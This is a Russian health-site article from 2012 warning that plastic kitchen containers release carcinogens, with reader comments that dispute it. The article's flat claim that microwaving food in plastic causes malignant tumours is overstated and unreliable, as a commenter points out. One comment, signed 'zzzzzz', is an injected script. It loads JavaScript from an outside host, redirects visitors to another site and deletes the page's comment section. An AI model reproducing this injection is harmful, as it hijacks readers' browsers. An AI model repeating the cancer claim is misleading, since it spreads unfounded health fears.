Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Детоксикация кухни  >>  Детоксикация кухни
 
Обратная связь
 

Детоксикация кухни

Размер шрифта
02 апреля 2012 07:30
  • google_analytics: false
  • Нравится

Есть ли на вашей кухне источники ядов-токсинов? Можно ли от них избавиться и каким образом?

  1. Пластиковые контейнеры

Любой пластик – продукт нефтепереработки. Одноразовое хранение холодной готовой еды в пластиковых контейнерах возможно. Нагревание или обработка в такой посуде невозможна. Невозможно безопасное хранение продуктов, содержащих кислоты (майонез) или алкоголь, а также горячих продуктов. В противном случае, пластик начинает выделять канцерогены. Выделение канцерогенов особенно усиливается после обработки и при повторном использовании.

  1. Пластик в микроволновке

Разогревание пищи в пластиковом контейнере с помощью микроволновки приводит к тому, что выделяющиеся канцерогены впитываются непосредственно в еду, вызывая впоследствии злокачественные опухоли.

На что заменить пластик?

Заменяя пластиковую посуду стеклянной или керамической, обратите внимание на внутреннюю поверхность: на ней не должно быть краски с металлическим содержимым.

Сюжеты по теме:
Дезинтоксикация. Избавляемся от токсинов на кухне

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - helena

02 апреля 2012 в 16:16

Цитировать   |   Пожаловаться

Пищевые пластики, которые разрешается использовать в микроволновках - исключительно полиэтилен и полипропилен. При их производстве НИКОГДА И НИСКОЛЬКО НЕ ИСПОЛЬЗУЮТСЯ НИКАКИЕ КАНЦЕРОГЕНННЫЕ КОМПОНЕНТЫ, которые, как говорите, могут выделяться при нагревании и хранении продуктов. В контейнерах из этих материалов хранят между прочим и лекарства (большинство медицинских баночек, а также мерных стаканчиков и ложечек именно из них и делается) даже агрессивные жидкости (кислоты разбавленные и концентрированные и щелочи) и многие растворители органические, поскольку эти пластики СОВЕРШЕННО ХИМИЧЕСКИ ИНЕРТНЫ!

Утомили уже напоминать Вам: научите людей читать обозначения на дне посуды! 

2 - Имя пользователя удалено

04 апреля 2012 в 18:55

Цитировать   |   Пожаловаться


helena 02 апреля 2012 в 16:16
Утомили уже напоминать Вам: научите людей читать обозначения на дне посуды! 
 Утомляться Вам причин  вовсе нет, вот на этой же странице ссылка на нашу статью от 13 августа 2011 года http://www.zdorovieinfo.ru/zdorovy_dom/stati/materialy/plastik_na_kuhne/
" .. Откажитесь от товаров из пластика с семеркой, тем более если на них нет маркировки «без БФА». Лучше налейте чай или воду в термос из нержавеющей стали.
Обращайте внимание на знаки переработки. Они подскажут, из какого пластика сделана понравившаяся вам посуда. Помимо несчастливой семерки, откажитесь от товаров с тройкой (ПВХ) и шестеркой (полистирол). Самым лучшим пластиком считается пятерка (полипропилен). Выбирая ребенку бутылочку для молока, обязательно поищите цифру на ней, чтобы узнать, из чего она сделана.
Замените пластик на стекло или керамику. 

Никто не отбирает у Вас пластиковые контейнеры, пользуйтесь, если хотите. Но 100% безопасной является посуда из стекла, именно этой мыслью авторы передачи делятся. 

4 - Гость

05 апреля 2012 в 15:29

Цитировать   |   Пожаловаться

Медицинский Модератор 04 апреля 2012 в 20:06
Никто не отбирает у Вас пластиковые контейнеры, пользуйтесь, если хотите. Но 100% безопасной является посуда из стекла, именно этой мыслью авторы передачи делятся.
 пластиковые контейнеры хотя бы не бьются и не растрескиваются в морозилке, а стеклянные в этом смысле не назовешь безопасными: раньше в банях висели плакаты "шампуни в стеклянной таре не приносить!".

5 - helena

05 апреля 2012 в 15:44

Цитировать   |   Пожаловаться

Медицинский Модератор 04 апреля 2012 в 20:06
Самым лучшим пластиком считается пятерка (полипропилен). Выбирая ребенку бутылочку для молока, обязательно поищите цифру на ней, чтобы узнать, из чего она сделана.
 А лучше не цифру, а буковки показать с расшифровкой (будьте уверены, население читать-то умеет, и не только по-русски), показать обозначение температуры (100 градусов), что означает можно горячее наливать, снежинку показать (замораживать продукты в морозилке можно), обозначения волн (в микроволновке пользоваться). И ВСЕ ЭТО С ЭКРАНА  СКАЗАТЬ И ПОКАЗАТЬ, а не в маленькой статейке на сайте. А то с экрана у Вас - все из нефтепродуктов, все канцерогены!

6 - zzzzzz

30 июня 2015 в 23:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

7 - hadertis

25 февраля 2016 в 23:55

Цитировать   |   Пожаловаться

а в бамбуковой интересно посуде можно греть?

Статьи

       
Антипригарное покрытие сделает вашего ребенка толстым   Как почистить унитаз. Супернеобычные способы   Как подобрать бюстгальтер в зависимости от груди   Чем вытереться, если нет туалетной бумаги?  

Слайдшоу

1
Неожиданные убийцы у вас на кухне
Кто живет в вашей постели?!
Как быстро и дешево убраться дома

Тесты

Электричество в спальне
Безопасна ли ваша кухня?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.